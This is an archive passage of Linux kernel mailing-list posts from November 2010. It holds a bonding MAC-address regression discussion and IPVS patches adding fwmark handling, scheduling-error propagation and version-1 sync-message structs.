* Re: [PATCH] bonding: check for assigned mac before adopting the slaves mac address
From: David Strand @ 2010-11-25  1:45 UTC (permalink / raw)
  To: Jay Vosburgh; +Cc: netdev, linux-kernel
In-Reply-To: <31169.1290641617@death>

We have a use case where we assign a mac to the bond device, because
the slave device configuration may change periodically. With older
kernels, it honored the assigned mac and everything was fine, with
2.6.36 it now uses the mac of whatever slave device is first instead
of our assigned one.

ifenslave code and documentation appears to still support the old way,
where a bond assigned mac will reign supreme, so this patch restores
that behavior.

On Wed, Nov 24, 2010 at 3:33 PM, Jay Vosburgh <fubar@us.ibm.com> wrote:
>        How exactly is this a regression?  The above referenced patch
> changes the method used to decide if the bonding master needs to have
> it's MAC address set.  The original way was "bonding master's MAC is
> zero," after the above, it's "adding first slave."
>
>        Do you have some use case that manually sets the master's MAC
> address prior to adding any slaves?
>
>        -J

^ permalink raw reply

* [PATCH 0/8] ipvs: ipvs update for nf-next-2.6
From: Simon Horman @ 2010-11-25  1:46 UTC (permalink / raw)
  To: lvs-devel, netdev, netfilter, netfilter-devel
  Cc: Hans Schillstrom, Julian Anastasov, Patrick McHardy

Hi Patrick,

please consider pulling in the new sync protocol for ipvs
by Hans Schillstrom from

git://git.kernel.org/pub/scm/linux/kernel/git/horms/lvs-test-2.6.git master

After this series I now have no outstanding IPVS patches for nf-next-2.6
in my queue.


^ permalink raw reply

* [PATCH 1/8] IPVS: Backup, Prepare for transferring firewall marks (fwmark) to the backup daemon.
From: Simon Horman @ 2010-11-25  1:46 UTC (permalink / raw)
  To: lvs-devel, netdev, netfilter, netfilter-devel
  Cc: Hans Schillstrom, Julian Anastasov, Patrick McHardy, Simon Horman
In-Reply-To: <1290649618-18955-1-git-send-email-horms@verge.net.au>

From: Hans Schillstrom <hans.schillstrom@ericsson.com>

One struct will have fwmark added:
 * ip_vs_conn

ip_vs_conn_new() and ip_vs_find_dest()
will have an extra param - fwmark
The effects of that, is in this patch.

Signed-off-by: Hans Schillstrom <hans.schillstrom@ericsson.com>
Acked-by: Julian Anastasov <ja@ssi.bg>
Signed-off-by: Simon Horman <horms@verge.net.au>
---
 include/net/ip_vs.h             |    6 ++++--
 net/netfilter/ipvs/ip_vs_conn.c |    5 +++--
 net/netfilter/ipvs/ip_vs_core.c |    8 ++++----
 net/netfilter/ipvs/ip_vs_ctl.c  |    4 ++--
 net/netfilter/ipvs/ip_vs_ftp.c  |    5 +++--
 net/netfilter/ipvs/ip_vs_sync.c |    4 ++--
 6 files changed, 18 insertions(+), 14 deletions(-)

diff --git a/include/net/ip_vs.h b/include/net/ip_vs.h
index d5a32e4..890f01c 100644
--- a/include/net/ip_vs.h
+++ b/include/net/ip_vs.h
@@ -382,6 +382,7 @@ struct ip_vs_conn {
 	union nf_inet_addr       vaddr;          /* virtual address */
 	union nf_inet_addr       daddr;          /* destination address */
 	volatile __u32           flags;          /* status flags */
+	__u32                    fwmark;         /* Fire wall mark from skb */
 	__be16                   cport;
 	__be16                   vport;
 	__be16                   dport;
@@ -720,7 +721,7 @@ extern void ip_vs_conn_fill_cport(struct ip_vs_conn *cp, __be16 cport);
 struct ip_vs_conn *ip_vs_conn_new(const struct ip_vs_conn_param *p,
 				  const union nf_inet_addr *daddr,
 				  __be16 dport, unsigned flags,
-				  struct ip_vs_dest *dest);
+				  struct ip_vs_dest *dest, __u32 fwmark);
 extern void ip_vs_conn_expire_now(struct ip_vs_conn *cp);
 
 extern const char * ip_vs_state_name(__u16 proto, int state);
@@ -901,7 +902,8 @@ extern int ip_vs_control_init(void);
 extern void ip_vs_control_cleanup(void);
 extern struct ip_vs_dest *
 ip_vs_find_dest(int af, const union nf_inet_addr *daddr, __be16 dport,
-		const union nf_inet_addr *vaddr, __be16 vport, __u16 protocol);
+		const union nf_inet_addr *vaddr, __be16 vport, __u16 protocol,
+		__u32 fwmark);
 extern struct ip_vs_dest *ip_vs_try_bind_dest(struct ip_vs_conn *cp);
 
 
diff --git a/net/netfilter/ipvs/ip_vs_conn.c b/net/netfilter/ipvs/ip_vs_conn.c
index 7615f9e..66e4662 100644
--- a/net/netfilter/ipvs/ip_vs_conn.c
+++ b/net/netfilter/ipvs/ip_vs_conn.c
@@ -613,7 +613,7 @@ struct ip_vs_dest *ip_vs_try_bind_dest(struct ip_vs_conn *cp)
 	if ((cp) && (!cp->dest)) {
 		dest = ip_vs_find_dest(cp->af, &cp->daddr, cp->dport,
 				       &cp->vaddr, cp->vport,
-				       cp->protocol);
+				       cp->protocol, cp->fwmark);
 		ip_vs_bind_dest(cp, dest);
 		return dest;
 	} else
@@ -803,7 +803,7 @@ void ip_vs_conn_expire_now(struct ip_vs_conn *cp)
 struct ip_vs_conn *
 ip_vs_conn_new(const struct ip_vs_conn_param *p,
 	       const union nf_inet_addr *daddr, __be16 dport, unsigned flags,
-	       struct ip_vs_dest *dest)
+	       struct ip_vs_dest *dest, __u32 fwmark)
 {
 	struct ip_vs_conn *cp;
 	struct ip_vs_protocol *pp = ip_vs_proto_get(p->protocol);
@@ -827,6 +827,7 @@ ip_vs_conn_new(const struct ip_vs_conn_param *p,
 			&cp->daddr, daddr);
 	cp->dport          = dport;
 	cp->flags	   = flags;
+	cp->fwmark         = fwmark;
 	if (flags & IP_VS_CONN_F_TEMPLATE && p->pe) {
 		ip_vs_pe_get(p->pe);
 		cp->pe = p->pe;
diff --git a/net/netfilter/ipvs/ip_vs_core.c b/net/netfilter/ipvs/ip_vs_core.c
index b4e51e9..e2bb3cd 100644
--- a/net/netfilter/ipvs/ip_vs_core.c
+++ b/net/netfilter/ipvs/ip_vs_core.c
@@ -293,7 +293,7 @@ ip_vs_sched_persist(struct ip_vs_service *svc,
 		 * and thus param.pe_data will be destroyed
 		 * when the template expires */
 		ct = ip_vs_conn_new(&param, &dest->addr, dport,
-				    IP_VS_CONN_F_TEMPLATE, dest);
+				    IP_VS_CONN_F_TEMPLATE, dest, skb->mark);
 		if (ct == NULL) {
 			kfree(param.pe_data);
 			return NULL;
@@ -319,7 +319,7 @@ ip_vs_sched_persist(struct ip_vs_service *svc,
 	 */
 	ip_vs_conn_fill_param(svc->af, iph.protocol, &iph.saddr, ports[0],
 			      &iph.daddr, ports[1], &param);
-	cp = ip_vs_conn_new(&param, &dest->addr, dport, flags, dest);
+	cp = ip_vs_conn_new(&param, &dest->addr, dport, flags, dest, skb->mark);
 	if (cp == NULL) {
 		ip_vs_conn_put(ct);
 		return NULL;
@@ -423,7 +423,7 @@ ip_vs_schedule(struct ip_vs_service *svc, struct sk_buff *skb,
 				      pptr[0], &iph.daddr, pptr[1], &p);
 		cp = ip_vs_conn_new(&p, &dest->addr,
 				    dest->port ? dest->port : pptr[1],
-				    flags, dest);
+				    flags, dest, skb->mark);
 		if (!cp)
 			return NULL;
 	}
@@ -489,7 +489,7 @@ int ip_vs_leave(struct ip_vs_service *svc, struct sk_buff *skb,
 					      &iph.daddr, pptr[1], &p);
 			cp = ip_vs_conn_new(&p, &daddr, 0,
 					    IP_VS_CONN_F_BYPASS | flags,
-					    NULL);
+					    NULL, skb->mark);
 			if (!cp)
 				return NF_DROP;
 		}
diff --git a/net/netfilter/ipvs/ip_vs_ctl.c b/net/netfilter/ipvs/ip_vs_ctl.c
index 3e92558..a5bd002 100644
--- a/net/netfilter/ipvs/ip_vs_ctl.c
+++ b/net/netfilter/ipvs/ip_vs_ctl.c
@@ -657,12 +657,12 @@ ip_vs_lookup_dest(struct ip_vs_service *svc, const union nf_inet_addr *daddr,
 struct ip_vs_dest *ip_vs_find_dest(int af, const union nf_inet_addr *daddr,
 				   __be16 dport,
 				   const union nf_inet_addr *vaddr,
-				   __be16 vport, __u16 protocol)
+				   __be16 vport, __u16 protocol, __u32 fwmark)
 {
 	struct ip_vs_dest *dest;
 	struct ip_vs_service *svc;
 
-	svc = ip_vs_service_get(af, 0, protocol, vaddr, vport);
+	svc = ip_vs_service_get(af, fwmark, protocol, vaddr, vport);
 	if (!svc)
 		return NULL;
 	dest = ip_vs_lookup_dest(svc, daddr, dport);
diff --git a/net/netfilter/ipvs/ip_vs_ftp.c b/net/netfilter/ipvs/ip_vs_ftp.c
index 7545500..84aef65 100644
--- a/net/netfilter/ipvs/ip_vs_ftp.c
+++ b/net/netfilter/ipvs/ip_vs_ftp.c
@@ -208,7 +208,7 @@ static int ip_vs_ftp_out(struct ip_vs_app *app, struct ip_vs_conn *cp,
 			n_cp = ip_vs_conn_new(&p, &from, port,
 					      IP_VS_CONN_F_NO_CPORT |
 					      IP_VS_CONN_F_NFCT,
-					      cp->dest);
+					      cp->dest, skb->mark);
 			if (!n_cp)
 				return 0;
 
@@ -365,7 +365,8 @@ static int ip_vs_ftp_in(struct ip_vs_app *app, struct ip_vs_conn *cp,
 		if (!n_cp) {
 			n_cp = ip_vs_conn_new(&p, &cp->daddr,
 					      htons(ntohs(cp->dport)-1),
-					      IP_VS_CONN_F_NFCT, cp->dest);
+					      IP_VS_CONN_F_NFCT, cp->dest,
+					      skb->mark);
 			if (!n_cp)
 				return 0;
 
diff --git a/net/netfilter/ipvs/ip_vs_sync.c b/net/netfilter/ipvs/ip_vs_sync.c
index 3897d6b..47eed67 100644
--- a/net/netfilter/ipvs/ip_vs_sync.c
+++ b/net/netfilter/ipvs/ip_vs_sync.c
@@ -404,7 +404,7 @@ static void ip_vs_process_message(char *buffer, const size_t buflen)
 					       s->dport,
 					       (union nf_inet_addr *)&s->vaddr,
 					       s->vport,
-					       s->protocol);
+					       s->protocol, 0);
 			/*  Set the approprite ativity flag */
 			if (s->protocol == IPPROTO_TCP) {
 				if (state != IP_VS_TCP_S_ESTABLISHED)
@@ -419,7 +419,7 @@ static void ip_vs_process_message(char *buffer, const size_t buflen)
 			}
 			cp = ip_vs_conn_new(&param,
 					    (union nf_inet_addr *)&s->daddr,
-					    s->dport, flags, dest);
+					    s->dport, flags, dest, 0);
 			if (dest)
 				atomic_dec(&dest->refcnt);
 			if (!cp) {
-- 
1.7.2.3


^ permalink raw reply related

* [PATCH 4/8] IPVS: Handle Scheduling errors.
From: Simon Horman @ 2010-11-25  1:46 UTC (permalink / raw)
  To: lvs-devel, netdev, netfilter, netfilter-devel
  Cc: Hans Schillstrom, Julian Anastasov, Patrick McHardy, Simon Horman
In-Reply-To: <1290649618-18955-1-git-send-email-horms@verge.net.au>

From: Hans Schillstrom <hans.schillstrom@ericsson.com>

If ip_vs_conn_fill_param_persist return an error to ip_vs_sched_persist,
this error must propagate as ignored=-1 to ip_vs_schedule().
Errors from ip_vs_conn_new() in ip_vs_sched_persist() and ip_vs_schedule()
should also return *ignored=-1;

This patch just relies on the fact that ignored is 1 before calling
ip_vs_sched_persist().

Sent from Julian:
  "The new case when ip_vs_conn_fill_param_persist fails
   should set *ignored = -1, so that we can use NF_DROP,
   see below. *ignored = -1 should be also used for ip_vs_conn_new
   failure in ip_vs_sched_persist() and ip_vs_schedule().
   The new negative value should be handled in tcp,udp,sctp"

"To summarize:

- *ignored = 1:
      protocol tried to schedule (eg. on SYN), found svc but the
      svc/scheduler decides that this packet should be accepted with
      NF_ACCEPT because it must not be scheduled.

- *ignored = 0:
      scheduler can not find destination, so try bypass or
      return ICMP and then NF_DROP (ip_vs_leave).

- *ignored = -1:
      scheduler tried to schedule but fatal error occurred, eg.
      ip_vs_conn_new failure (ENOMEM) or ip_vs_sip_fill_param
      failure such as missing Call-ID, ENOMEM on skb_linearize
      or pe_data. In this case we should return NF_DROP without
      any attempts to send ICMP with ip_vs_leave."

More or less all ideas and input to this patch is work from
Julian Anastasov

Signed-off-by: Hans Schillstrom <hans.schillstrom@ericsson.com>
Acked-by: Julian Anastasov <ja@ssi.bg>
Signed-off-by: Simon Horman <horms@verge.net.au>
---
 net/netfilter/ipvs/ip_vs_core.c       |   56 +++++++++++++++++++++++---------
 net/netfilter/ipvs/ip_vs_proto_sctp.c |   11 +++++--
 net/netfilter/ipvs/ip_vs_proto_tcp.c  |   10 +++++-
 net/netfilter/ipvs/ip_vs_proto_udp.c  |   10 +++++-
 4 files changed, 64 insertions(+), 23 deletions(-)

diff --git a/net/netfilter/ipvs/ip_vs_core.c b/net/netfilter/ipvs/ip_vs_core.c
index 9acdd79..3445da6 100644
--- a/net/netfilter/ipvs/ip_vs_core.c
+++ b/net/netfilter/ipvs/ip_vs_core.c
@@ -177,7 +177,7 @@ ip_vs_set_state(struct ip_vs_conn *cp, int direction,
 	return pp->state_transition(cp, direction, skb, pp);
 }
 
-static inline void
+static inline int
 ip_vs_conn_fill_param_persist(const struct ip_vs_service *svc,
 			      struct sk_buff *skb, int protocol,
 			      const union nf_inet_addr *caddr, __be16 cport,
@@ -187,7 +187,9 @@ ip_vs_conn_fill_param_persist(const struct ip_vs_service *svc,
 	ip_vs_conn_fill_param(svc->af, protocol, caddr, cport, vaddr, vport, p);
 	p->pe = svc->pe;
 	if (p->pe && p->pe->fill_param)
-		p->pe->fill_param(p, skb);
+		return p->pe->fill_param(p, skb);
+
+	return 0;
 }
 
 /*
@@ -200,7 +202,7 @@ ip_vs_conn_fill_param_persist(const struct ip_vs_service *svc,
 static struct ip_vs_conn *
 ip_vs_sched_persist(struct ip_vs_service *svc,
 		    struct sk_buff *skb,
-		    __be16 src_port, __be16 dst_port)
+		    __be16 src_port, __be16 dst_port, int *ignored)
 {
 	struct ip_vs_conn *cp = NULL;
 	struct ip_vs_iphdr iph;
@@ -268,20 +270,27 @@ ip_vs_sched_persist(struct ip_vs_service *svc,
 				vaddr = &fwmark;
 			}
 		}
-		ip_vs_conn_fill_param_persist(svc, skb, protocol, &snet, 0,
-					      vaddr, vport, &param);
+		/* return *ignored = -1 so NF_DROP can be used */
+		if (ip_vs_conn_fill_param_persist(svc, skb, protocol, &snet, 0,
+						  vaddr, vport, &param) < 0) {
+			*ignored = -1;
+			return NULL;
+		}
 	}
 
 	/* Check if a template already exists */
 	ct = ip_vs_ct_in_get(&param);
 	if (!ct || !ip_vs_check_template(ct)) {
-		/* No template found or the dest of the connection
+		/*
+		 * No template found or the dest of the connection
 		 * template is not available.
+		 * return *ignored=0 i.e. ICMP and NF_DROP
 		 */
 		dest = svc->scheduler->schedule(svc, skb);
 		if (!dest) {
 			IP_VS_DBG(1, "p-schedule: no dest found.\n");
 			kfree(param.pe_data);
+			*ignored = 0;
 			return NULL;
 		}
 
@@ -296,6 +305,7 @@ ip_vs_sched_persist(struct ip_vs_service *svc,
 				    IP_VS_CONN_F_TEMPLATE, dest, skb->mark);
 		if (ct == NULL) {
 			kfree(param.pe_data);
+			*ignored = -1;
 			return NULL;
 		}
 
@@ -323,6 +333,7 @@ ip_vs_sched_persist(struct ip_vs_service *svc,
 	cp = ip_vs_conn_new(&param, &dest->addr, dport, flags, dest, skb->mark);
 	if (cp == NULL) {
 		ip_vs_conn_put(ct);
+		*ignored = -1;
 		return NULL;
 	}
 
@@ -342,6 +353,21 @@ ip_vs_sched_persist(struct ip_vs_service *svc,
  *  It selects a server according to the virtual service, and
  *  creates a connection entry.
  *  Protocols supported: TCP, UDP
+ *
+ *  Usage of *ignored
+ *
+ * 1 :   protocol tried to schedule (eg. on SYN), found svc but the
+ *       svc/scheduler decides that this packet should be accepted with
+ *       NF_ACCEPT because it must not be scheduled.
+ *
+ * 0 :   scheduler can not find destination, so try bypass or
+ *       return ICMP and then NF_DROP (ip_vs_leave).
+ *
+ * -1 :  scheduler tried to schedule but fatal error occurred, eg.
+ *       ip_vs_conn_new failure (ENOMEM) or ip_vs_sip_fill_param
+ *       failure such as missing Call-ID, ENOMEM on skb_linearize
+ *       or pe_data. In this case we should return NF_DROP without
+ *       any attempts to send ICMP with ip_vs_leave.
  */
 struct ip_vs_conn *
 ip_vs_schedule(struct ip_vs_service *svc, struct sk_buff *skb,
@@ -372,11 +398,9 @@ ip_vs_schedule(struct ip_vs_service *svc, struct sk_buff *skb,
 	}
 
 	/*
-	 * Do not schedule replies from local real server. It is risky
-	 * for fwmark services but mostly for persistent services.
+	 *    Do not schedule replies from local real server.
 	 */
 	if ((!skb->dev || skb->dev->flags & IFF_LOOPBACK) &&
-	    (svc->flags & IP_VS_SVC_F_PERSISTENT || svc->fwmark) &&
 	    (cp = pp->conn_in_get(svc->af, skb, pp, &iph, iph.len, 1))) {
 		IP_VS_DBG_PKT(12, svc->af, pp, skb, 0,
 			      "Not scheduling reply for existing connection");
@@ -387,10 +411,10 @@ ip_vs_schedule(struct ip_vs_service *svc, struct sk_buff *skb,
 	/*
 	 *    Persistent service
 	 */
-	if (svc->flags & IP_VS_SVC_F_PERSISTENT) {
-		*ignored = 0;
-		return ip_vs_sched_persist(svc, skb, pptr[0], pptr[1]);
-	}
+	if (svc->flags & IP_VS_SVC_F_PERSISTENT)
+		return ip_vs_sched_persist(svc, skb, pptr[0], pptr[1], ignored);
+
+	*ignored = 0;
 
 	/*
 	 *    Non-persistent service
@@ -403,8 +427,6 @@ ip_vs_schedule(struct ip_vs_service *svc, struct sk_buff *skb,
 		return NULL;
 	}
 
-	*ignored = 0;
-
 	dest = svc->scheduler->schedule(svc, skb);
 	if (dest == NULL) {
 		IP_VS_DBG(1, "Schedule: no dest found.\n");
@@ -425,8 +447,10 @@ ip_vs_schedule(struct ip_vs_service *svc, struct sk_buff *skb,
 		cp = ip_vs_conn_new(&p, &dest->addr,
 				    dest->port ? dest->port : pptr[1],
 				    flags, dest, skb->mark);
-		if (!cp)
+		if (!cp) {
+			*ignored = -1;
 			return NULL;
+		}
 	}
 
 	IP_VS_DBG_BUF(6, "Schedule fwd:%c c:%s:%u v:%s:%u "
diff --git a/net/netfilter/ipvs/ip_vs_proto_sctp.c b/net/netfilter/ipvs/ip_vs_proto_sctp.c
index 1ea96bc..a315159 100644
--- a/net/netfilter/ipvs/ip_vs_proto_sctp.c
+++ b/net/netfilter/ipvs/ip_vs_proto_sctp.c
@@ -47,13 +47,18 @@ sctp_conn_schedule(int af, struct sk_buff *skb, struct ip_vs_protocol *pp,
 		 * incoming connection, and create a connection entry.
 		 */
 		*cpp = ip_vs_schedule(svc, skb, pp, &ignored);
-		if (!*cpp && !ignored) {
-			*verdict = ip_vs_leave(svc, skb, pp);
+		if (!*cpp && ignored <= 0) {
+			if (!ignored)
+				*verdict = ip_vs_leave(svc, skb, pp);
+			else {
+				ip_vs_service_put(svc);
+				*verdict = NF_DROP;
+			}
 			return 0;
 		}
 		ip_vs_service_put(svc);
 	}
-
+	/* NF_ACCEPT */
 	return 1;
 }
 
diff --git a/net/netfilter/ipvs/ip_vs_proto_tcp.c b/net/netfilter/ipvs/ip_vs_proto_tcp.c
index f6c5200..1cdab12 100644
--- a/net/netfilter/ipvs/ip_vs_proto_tcp.c
+++ b/net/netfilter/ipvs/ip_vs_proto_tcp.c
@@ -64,12 +64,18 @@ tcp_conn_schedule(int af, struct sk_buff *skb, struct ip_vs_protocol *pp,
 		 * incoming connection, and create a connection entry.
 		 */
 		*cpp = ip_vs_schedule(svc, skb, pp, &ignored);
-		if (!*cpp && !ignored) {
-			*verdict = ip_vs_leave(svc, skb, pp);
+		if (!*cpp && ignored <= 0) {
+			if (!ignored)
+				*verdict = ip_vs_leave(svc, skb, pp);
+			else {
+				ip_vs_service_put(svc);
+				*verdict = NF_DROP;
+			}
 			return 0;
 		}
 		ip_vs_service_put(svc);
 	}
+	/* NF_ACCEPT */
 	return 1;
 }
 
diff --git a/net/netfilter/ipvs/ip_vs_proto_udp.c b/net/netfilter/ipvs/ip_vs_proto_udp.c
index 9d106a0..cd398de 100644
--- a/net/netfilter/ipvs/ip_vs_proto_udp.c
+++ b/net/netfilter/ipvs/ip_vs_proto_udp.c
@@ -63,12 +63,18 @@ udp_conn_schedule(int af, struct sk_buff *skb, struct ip_vs_protocol *pp,
 		 * incoming connection, and create a connection entry.
 		 */
 		*cpp = ip_vs_schedule(svc, skb, pp, &ignored);
-		if (!*cpp && !ignored) {
-			*verdict = ip_vs_leave(svc, skb, pp);
+		if (!*cpp && ignored <= 0) {
+			if (!ignored)
+				*verdict = ip_vs_leave(svc, skb, pp);
+			else {
+				ip_vs_service_put(svc);
+				*verdict = NF_DROP;
+			}
 			return 0;
 		}
 		ip_vs_service_put(svc);
 	}
+	/* NF_ACCEPT */
 	return 1;
 }
 
-- 
1.7.2.3


^ permalink raw reply related

* [PATCH 5/8] IPVS: Backup, Adding structs for new sync format
From: Simon Horman @ 2010-11-25  1:46 UTC (permalink / raw)
  To: lvs-devel, netdev, netfilter, netfilter-devel
  Cc: Hans Schillstrom, Julian Anastasov, Patrick McHardy, Simon Horman
In-Reply-To: <1290649618-18955-1-git-send-email-horms@verge.net.au>

From: Hans Schillstrom <hans.schillstrom@ericsson.com>

New structs defined for version 1 of sync.

 * ip_vs_sync_v4       Ipv4 base format struct
 * ip_vs_sync_v6       Ipv6 base format struct

Signed-off-by: Hans Schillstrom <hans.schillstrom@ericsson.com>
Acked-by: Julian Anastasov <ja@ssi.bg>
Signed-off-by: Simon Horman <horms@verge.net.au>
---
 net/netfilter/ipvs/ip_vs_sync.c |  154 ++++++++++++++++++++++++++++++++++++---
 1 files changed, 142 insertions(+), 12 deletions(-)

diff --git a/net/netfilter/ipvs/ip_vs_sync.c b/net/netfilter/ipvs/ip_vs_sync.c
index 47eed67..566482f 100644
--- a/net/netfilter/ipvs/ip_vs_sync.c
+++ b/net/netfilter/ipvs/ip_vs_sync.c
@@ -43,11 +43,13 @@
 #define IP_VS_SYNC_GROUP 0xe0000051    /* multicast addr - 224.0.0.81 */
 #define IP_VS_SYNC_PORT  8848          /* multicast port */
 
+#define SYNC_PROTO_VER  1		/* Protocol version in header */
 
 /*
  *	IPVS sync connection entry
+ *	Version 0, i.e. original version.
  */
-struct ip_vs_sync_conn {
+struct ip_vs_sync_conn_v0 {
 	__u8			reserved;
 
 	/* Protocol, addresses and port numbers */
@@ -71,40 +73,157 @@ struct ip_vs_sync_conn_options {
 	struct ip_vs_seq        out_seq;        /* outgoing seq. struct */
 };
 
+/*
+     Sync Connection format (sync_conn)
+
+       0                   1                   2                   3
+       0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |    Type       |    Protocol   | Ver.  |        Size           |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |                             Flags                             |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |            State              |         cport                 |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |            vport              |         dport                 |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |                             fwmark                            |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |                             timeout  (in sec.)                |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |                              ...                              |
+      |                        IP-Addresses  (v4 or v6)               |
+      |                              ...                              |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+  Optional Parameters.
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      | Param. Type    | Param. Length |   Param. data                |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+                               |
+      |                              ...                              |
+      |                               +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |                               | Param Type    | Param. Length |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |                           Param  data                         |
+      |         Last Param data should be padded for 32 bit alignment |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+*/
+
+/*
+ *  Type 0, IPv4 sync connection format
+ */
+struct ip_vs_sync_v4 {
+	__u8			type;
+	__u8			protocol;	/* Which protocol (TCP/UDP) */
+	__be16			ver_size;	/* Version msb 4 bits */
+	/* Flags and state transition */
+	__be32			flags;		/* status flags */
+	__be16			state;		/* state info 	*/
+	/* Protocol, addresses and port numbers */
+	__be16			cport;
+	__be16			vport;
+	__be16			dport;
+	__be32			fwmark;		/* Firewall mark from skb */
+	__be32			timeout;	/* cp timeout */
+	__be32			caddr;		/* client address */
+	__be32			vaddr;		/* virtual address */
+	__be32			daddr;		/* destination address */
+	/* The sequence options start here */
+	/* PE data padded to 32bit alignment after seq. options */
+};
+/*
+ * Type 2 messages IPv6
+ */
+struct ip_vs_sync_v6 {
+	__u8			type;
+	__u8			protocol;	/* Which protocol (TCP/UDP) */
+	__be16			ver_size;	/* Version msb 4 bits */
+	/* Flags and state transition */
+	__be32			flags;		/* status flags */
+	__be16			state;		/* state info 	*/
+	/* Protocol, addresses and port numbers */
+	__be16			cport;
+	__be16			vport;
+	__be16			dport;
+	__be32			fwmark;		/* Firewall mark from skb */
+	__be32			timeout;	/* cp timeout */
+	struct in6_addr		caddr;		/* client address */
+	struct in6_addr		vaddr;		/* virtual address */
+	struct in6_addr		daddr;		/* destination address */
+	/* The sequence options start here */
+	/* PE data padded to 32bit alignment after seq. options */
+};
+
+union ip_vs_sync_conn {
+	struct ip_vs_sync_v4	v4;
+	struct ip_vs_sync_v6	v6;
+};
+
+/* Bits in Type field in above */
+#define STYPE_INET6		0
+#define STYPE_F_INET6		(1 << STYPE_INET6)
+
+#define SVER_SHIFT		12		/* Shift to get version */
+#define SVER_MASK		0x0fff		/* Mask to strip version */
+
+#define IPVS_OPT_SEQ_DATA	1
+#define IPVS_OPT_PE_DATA	2
+#define IPVS_OPT_PE_NAME	3
+#define IPVS_OPT_PARAM		7
+
+#define IPVS_OPT_F_SEQ_DATA	(1 << (IPVS_OPT_SEQ_DATA-1))
+#define IPVS_OPT_F_PE_DATA	(1 << (IPVS_OPT_PE_DATA-1))
+#define IPVS_OPT_F_PE_NAME	(1 << (IPVS_OPT_PE_NAME-1))
+#define IPVS_OPT_F_PARAM	(1 << (IPVS_OPT_PARAM-1))
+
 struct ip_vs_sync_thread_data {
 	struct socket *sock;
 	char *buf;
 };
 
-#define SIMPLE_CONN_SIZE  (sizeof(struct ip_vs_sync_conn))
+/* Version 0 definition of packet sizes */
+#define SIMPLE_CONN_SIZE  (sizeof(struct ip_vs_sync_conn_v0))
 #define FULL_CONN_SIZE  \
-(sizeof(struct ip_vs_sync_conn) + sizeof(struct ip_vs_sync_conn_options))
+(sizeof(struct ip_vs_sync_conn_v0) + sizeof(struct ip_vs_sync_conn_options))
 
 
 /*
-  The master mulitcasts messages to the backup load balancers in the
-  following format.
+  The master mulitcasts messages (Datagrams) to the backup load balancers
+  in the following format.
+
+ Version 1:
+  Note, first byte should be Zero, so ver 0 receivers will drop the packet.
 
        0                   1                   2                   3
        0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
-      |  Count Conns  |    SyncID     |            Size               |
+      |      0        |    SyncID     |            Size               |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |  Count Conns  |    Version    |    Reserved, set to Zero      |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                                                               |
       |                    IPVS Sync Connection (1)                   |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                            .                                  |
-      |                            .                                  |
+      ~                            .                                  ~
       |                            .                                  |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                                                               |
       |                    IPVS Sync Connection (n)                   |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+ Version 0 Header
+       0                   1                   2                   3
+       0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |  Count Conns  |    SyncID     |            Size               |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |                    IPVS Sync Connection (1)                   |
 */
 
 #define SYNC_MESG_HEADER_LEN	4
 #define MAX_CONNS_PER_SYNCBUFF	255 /* nr_conns in ip_vs_sync_mesg is 8 bit */
 
+/* Version 0 header */
 struct ip_vs_sync_mesg {
 	__u8                    nr_conns;
 	__u8                    syncid;
@@ -113,6 +232,17 @@ struct ip_vs_sync_mesg {
 	/* ip_vs_sync_conn entries start here */
 };
 
+/* Version 1 header */
+struct ip_vs_sync_mesg_v2 {
+	__u8			reserved;	/* must be zero */
+	__u8			syncid;
+	__u16			size;
+	__u8			nr_conns;
+	__s8			version;	/* SYNC_PROTO_VER  */
+	__u16			spare;
